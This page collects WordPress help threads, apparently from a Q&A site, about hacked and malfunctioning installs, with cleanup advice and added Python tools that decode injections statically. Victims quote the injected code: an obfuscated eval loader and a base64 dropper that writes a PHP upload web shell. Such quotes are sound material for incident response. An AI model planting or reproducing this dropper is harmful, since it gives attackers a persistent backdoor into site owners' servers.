This question already has answers here:
My site is infected with obfuscated PHP malware - what is it doing + how do I get rid of it?
(6 answers)
Closed last month.
I have a problem with WordPress. Someone infected my WordPress catalogue. Core, theme and plugins are up to date. In the files xmlrpc.php, wp-trackback.php, wp-signup.php etc. (all PHP files), the code below has been added at the end of the file. When I delete this code from the files, it appears again within the next few days :(
<?php $dAglL = 'b'.'ase64'.'_d'.'ecode'; $lufhp = 'st'.'r'.'_ro'.'t13'; $waAFR = 's'.'t'.'rrev'; $QIGep = 'g'.'zuncompre'.'ss'; error_reporting(0); ini_set('error_log', NULL); eval($QIGep($waAFR($lufhp($dAglL('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'))))); ?>
Do you have any idea what elements could have caused this security issue? You need to find the source of the problem; if not, no matter what you do, it might happen again.
However, here is what I suggest to you:
Back up all your website's current data, files, database, etc.
You can completely reinstall all core files like wp-admin, wp-includes etc. The best solution will be to reinstall a fresh WordPress, then import your backed-up database and also re-add your files in "wp-content"
Check your "uploads" directory, maybe the "hacker" installed a malicious file
Check your "wp_users" table to see if there is any unknown user, and also change your admin password
DON'T USE any cracked plugin, theme etc. Maybe it is not your case, but I prefer to highlight it, because it is very important
You can also install this plugin to see what happens on your website. You will not see everything, but it can help in some cases: https://wordpress.org/plugins/stream/
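To see what such an appended snippet hides without running it, the layers can be undone statically. The following is an added example, not part of the original posts: `analyse` and `constructed_sample` are hypothetical names, and the sample input is constructed around a harmless body.

```python
import base64
import re
import zlib

ROT13 = bytes.maketrans(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    b"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm")

# Python equivalents of the four PHP functions the injected snippet names.
LAYERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda b: b.translate(ROT13),
    "strrev": lambda b: b[::-1],
    "gzuncompress": zlib.decompress,
}

def analyse(php_src):
    """Return (chain, decoded); chain is outermost-first, decoded is bytes or None."""
    src = re.sub(r"'\s*\.\s*'", "", php_src)      # 'b'.'ase64' -> 'base64'
    names = dict(re.findall(r"\$(\w+)\s*=\s*'(\w+)'\s*;", src))
    m = re.search(r"eval\s*\(\s*((?:\$\w+\s*\(\s*)+)'([^']*)'", src)
    if not m:
        return None                                # no eval-of-decoders pattern
    chain = [names.get(v, "?") for v in re.findall(r"\$(\w+)", m.group(1))]
    data = m.group(2).encode()
    try:
        for fn in reversed(chain):                 # innermost call runs first
            data = LAYERS[fn](data)
    except (KeyError, ValueError, zlib.error):     # unknown layer or damaged blob
        return chain, None
    return chain, data                             # bytes to read, never to run

def constructed_sample(body):
    """Constructed fixture: the wrapper from the question around a harmless body."""
    blob = base64.b64encode(zlib.compress(body)[::-1].translate(ROT13)).decode()
    return ("<?php $dAglL = 'b'.'ase64'.'_d'.'ecode'; $lufhp = 'st'.'r'.'_ro'.'t13';"
            " $waAFR = 's'.'t'.'rrev'; $QIGep = 'g'.'zuncompre'.'ss';"
            " error_reporting(0); eval($QIGep($waAFR($lufhp($dAglL('" + blob + "'))))); ?>")

if __name__ == "__main__":
    chain, decoded = analyse(constructed_sample(b'echo "constructed, harmless";'))
    print(" <- ".join(chain))
    print(decoded.decode())
```

Run it against a copy of an infected file on an analysis machine, not on the live server; the decoded bytes usually show where the reinfection comes from.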
Related
I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are overwritten with bad information.
This results in two problems - first the DB access details in wp-config are changed to something that doesn't work, and then the ability to access my post-link permalinks is lost as a result of information being lost from htaccess.
After being overwritten, my wp-config file is full of lines like this:
file_put_contents("wp-remote-upload.php", base64_decode('PD9waHANCmVjaG8gIlRoaXMgc2hpdCB3b3JrcyEiOw0KaWYgKGlzc2V0KCRfRklMRVNbImZpbGVuYW1lIl0pKQ0Kew0KICAgaWYoJF9GSUxFU1siZmlsZW5hbWUiXVsic2l6ZSJdID4gMTAyNCozKjEwMjQpDQogICB7DQogICAgIGVjaG8gKCJGaWxlIHRvbyBsYXJnZSAobW9yZSB0aGFuIDNNYikiKTsNCiAgICAgZXhpdDsNCiAgIH0NCiAgIGlmKGlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZW5hbWUiXVsidG1wX25hbWUiXSkpDQogICB7DQogICAgIG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlbmFtZSJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmaWxlbmFtZSJdWyJuYW1lIl0pOw0KCSBlY2hvICgiPGJyPkRvbmUhPGJyPiIpOw0KICAgfSBlbHNlIHsNCiAgICAgIGVjaG8oIjxicj5FcnJvciEgIi4kcGhwX2Vycm9ybXNnLiI8YnI+Iik7DQogICB9DQp9DQo/Pg=='));
My wp-config file has so many of these lines that it is about 800Kb in size.
The plugins I am using on my WordPress site are as follows:
Akismet Anti-Spam [v4.0.1 by Automattic]
Contact Form 7 [v4.9.2 by Takayuki Miyoshi]
Duplicator [v1.2.3 by Snap Creek]
Google Analytics for WordPress [v7.7.1 by MonsterInsights]
Hello Dolly [v1.6 by Matt Mullenweg]
Limit Login Attempts [v1.7.1 by Johan Eenfeldt]
Logo Slider [v1.4.7 by EnigmaWeb]
Recent Posts Widget Extended [v0.9.9.7 by Satrya]
Squelch Tabs and Accordions Shortcodes [v0.4.1 by Matt Lowe]
WordPress Importer [v0.6.3 by wordpressdotorg]
Yoast SEO [v5.9.1 by Team Yoast]
Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to - however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.
How do I stop these files from being overwritten?
Or how can I discover what is responsible for changing these files?
Looks like your system was compromised / hacked.
Suggest you start by googling what to do in such a case, there’s plenty of resources out there that cover the basics.
Ideally, you should probably delete all core WP and plugin folders, and upload the files again from a “clean” system (to avoid that other files that might have been inserted into your system can still be reached by the attacker from the outside.)
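Before deleting anything, it helps to record what the injected wp-config.php lines would have written. The following is an added example, not part of the original posts: `summarise_droppers` is a hypothetical name and the sample config is constructed with a harmless stand-in blob.

```python
import base64
import binascii
import hashlib
import re
from collections import Counter

# file_put_contents("<target>", base64_decode('<blob>')) as in the wp-config lines.
DROPPER = re.compile(
    r"""file_put_contents\s*\(\s*(["'])(?P<target>[^"']+)\1\s*,\s*"""
    r"""base64_decode\s*\(\s*(["'])(?P<blob>[A-Za-z0-9+/=\s]*)\3\s*\)\s*\)""")
UPLOAD_MARKERS = (b"$_FILES", b"move_uploaded_file")  # signs of an upload handler

def summarise_droppers(php_src):
    """Describe each distinct dropper statement; nothing is executed or written."""
    copies, details = Counter(), {}
    for m in DROPPER.finditer(php_src):
        try:
            body = base64.b64decode(m["blob"])
        except binascii.Error:
            body = b""                              # damaged blob: still report it
        key = (m["target"], hashlib.sha256(body).hexdigest())
        copies[key] += 1
        details[key] = {
            "target": m["target"], "bytes": len(body), "sha256": key[1],
            "upload_handler": any(s in body for s in UPLOAD_MARKERS),
        }
    return [dict(details[k], copies=n) for k, n in copies.most_common()]

# Constructed sample: a wp-config.php with one legitimate line and the same
# dropper statement repeated, as the question describes. The blob is a harmless
# stand-in that only mentions the marker strings.
_BLOB = base64.b64encode(
    b"<?php /* constructed stand-in: $_FILES move_uploaded_file */ ?>").decode()
_LINE = "file_put_contents(\"wp-remote-upload.php\", base64_decode('%s'));\n" % _BLOB
SAMPLE_CONFIG = "<?php\ndefine('DB_NAME', 'example');\n" + _LINE * 3

if __name__ == "__main__":
    for d in summarise_droppers(SAMPLE_CONFIG):
        print(d)
```

The reported target name and SHA-256 give you something concrete to search for across the rest of the account and in the access logs.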
I would like to change the theme file through the WordPress Admin Panel, in menu Appearance > Theme Editor, but I've got the message:
Something went wrong. Your change may not have been saved. Please try again. There is also a chance that you may need to manually fix and upload the file over FTP.
Everything was working correctly before I've made some changes in the file and upload it through the FTP back to the server. I am able to change every other file in Theme Editor, but this one. The rights are the same as in other files I am able to change, the owner and group are the same too. It looks that everything should work, but this and only this one file I have updated via FTP I am not able to change through the Theme Editor of Wordpress Admin Panel.
Any idea what could possibly be wrong? What have I done wrong? Please help me somebody, most of the time I am on the "safe" network, and the server FTP is not accessible from my computer.
Thank you.
Check Theme Permission
One of the first things you have to check is the theme files and folder permissions.
If you are running on shared hosting then mostly it would be alright. However, if using VPS or Cloud then you have to ensure that the same user owns the theme files as the one the web server (Nginx or Apache HTTP) is running as.
Modify File Permissions with chmod
FYR :- https://www.linode.com/docs/tools-reference/tools/modify-file-permissions-with-chmod/
Check Security Plugins
Are you using any security plugins? Do you have the option to check their logs to see how exactly your request is being treated?
Alternatively, you can quickly disable the security plugin and verify if that works.
I have finally solved the problem. There were two things in my question that were misleading.
The first one was that I wrote "Everything was working correctly before I've made some changes in the file and upload it through the FTP" and after that I wrote it again in a comment on the answer. I was so sure that I had tried the same file before, but I had not; it definitely was another one. I am sorry.
And the second was that I did not write the specific file name. The file was includes/_wp_utils.php. Somebody might have noticed that this is the biggest file in that directory. And that was the problem. I do not know why, maybe it was too big for server processing or something else (120KB), but I noticed it later, and I tried splitting the file into a few smaller files and included them in includes/_wp_utils.php with the command include_once __DIR__ . '/_wp_utils/_nth_part_of_original_wp_utils.php';.
Thank you #G.D Udara Lahiru Sampath, I absolutely liked your answer. It was useful and very important to check.
My site got hacked and on the first line of every PHP file I have this line:
<?php $knitglx = '<%G]y6d]281Ld]245]K2 ... $knitglx=$fmfqhx-1; ?><?php (it is very long). Since I am using WordPress there are millions of files and it is impossible to open them one by one and delete this line. Is there a way to delete them all at once?
I read something about some sed functions but I do not know how to use them, and after some discussion I know that will not solve my problem, so now I am looking for a way to scan and remove viruses from my files. Any help would be okay.
If your site got hacked you REALLY should not try to clean the source code they injected! It is very likely that you will forget something and you may spread malware or whatever to the visitors of your WordPress site. Also try to figure out why you got hacked and fix the hole.
Make sure to delete all files from the server and change all your passwords (FTP, WordPress, etc. etc.).
Here is what you can do:
1) Contact your provider and ask them to setup the latest clean backup
2) Setup your own latest clean backup
3) If you really have no backup (which is very bad) do the following:
Make a fresh installation of WordPress.
download your wp-content folder and check this for any malicious code
download your database and check for any malicious code
place the clean code / database into the WordPress installation
Simply deleting the first line of each file is most probably not enough. However, there are solutions to this:
Batch file to delete first 3 lines of a text file
Delete certain lines in a txt file via a batch file
Note: With an IDE like Netbeans or IntelliJ you can do a search / replace on a huge number of PHP files. This might also help if step three is the only option.
The third possibility is not good because it means a lot of work ... good luck!
I have a WordPress website that's been running for almost two years now. All of a sudden, it started to show a blank page on any public page. The admin part on /wp-admin is still working without any problems.
An HTTP request is successful (status 200), but the returned content is completely empty (not even an tag).
I'm not really a PHP/WP expert. A simple web search got a lot of results, but mostly old stuff and never any clear conclusion of the problem's source, i.e. how to fix it. I already enabled WP_DEBUG in wp-config.php, but this only shows debug messages in wp-admin, but the public page remains blank.
Where should I continue searching?
The problematic website is http://lolkitten.org/.
Update
I just found index.php inside my public_html, which was empty. After writing something into it, it appears on my home page! Also, there's a directory /home/<user>/home/<user>/public_html/ which looks like complete nonsense to me.
Update 2
The problem solved itself after upgrading to WordPress 3.8. I don't know why, but it seems like some files (like index.php) were messed up and got replaced by fresh ones in this update.
Possible solution / workaround
I've had this problem again. This time, my index.php was completely empty. In my dashboard, under Dashboard > Updates, I clicked on Re-install Now and it fixed itself.
Most likely the wp-content folder can’t be found. When you login to the admin does it state that the templates can’t be found in red text in the center of the page right when you login?
I recommend going into your wp-config.php and adjust—or add—the following constants:
define('WP_SITEURL', 'http://lolkitten.org');
define('WP_HOME', 'http://lolkitten.org');
define('WP_CONTENT_DIR', '/path/to/your/wp-content');
define('WP_CONTENT_URL', 'http://lolkitten.org/wp-content');
Fairly confident that the key to fixing this will be the WP_CONTENT_DIR setting. You need the full path to the directory in the file system to your wp-content folder. So if you have a standard Unix setup with lolkitten.org in its own directory that path would be:
/var/www/lolkitten.org/wp-content
And the WP_CONTENT_DIR value would be:
define('WP_CONTENT_DIR', '/var/www/lolkitten.org/wp-content');
EDIT Adding info on how to determine your script’s absolute path if you do not have SSH access to the server, but have FTP access of some sort. Just FTP to the server & create a test file called test.php and just put the following code in it:
<?php
echo dirname(__FILE__);
?>
Now load that into your browser to get the full path:
http://lolkitten.org/test.php
__FILE__ is a magic constant in PHP that will echo the full/absolute path of a PHP script.
Try deactivating all the plugins once.
And if you cannot access the admin panel, do the following to deactivate plugins:
In the database - wp_options table
change the entry to a:0:{} on option ID 35- active_plugins
As far as I can see, the error is because of the share-buttons plugin.
Try removing share-buttons plugin from plugin folder and then check again.
If still problem exists then remove all active plugins and check again.
I too had same issue and it was because of plugin. I deactivated plugins one by one and my site was recovered from crash.
Here is my official WordPress forum support plea: http://wordpress.org/support/topic/headerphp-is-not-updating?replies=4
I changed all the permissions via FTP, currently set to 777. Originally 666, but that didn't work, so here we are.
I cleared all of my browser caches.
I added the following line to wp-config.php:
define('DISABLE_CACHE', true);
I don't know what else to do at this point. The file on my server reflects the changes I made, but if you look at the source on the website, via Firebug or whatever, it isn't there.
From the native WordPress editor, it says I can't edit the file because the permissions aren't set. What's really absurd is that this is a custom theme specifically for this website. Whose business is it if I want to change it?
Can anyone please at least verify that the correct 'header.php' is in wp-content/themes/themeofchoice?
EDIT: I don't know what happened but suddenly my changes have taken effect. I guess WordPress takes hours to update .php files? WOW.
Thank you for your answers everybody. If anyone has similar problems, I guess take the same steps I did. If anything changed, I continued to change the permissions of all the parent folders as was suggested.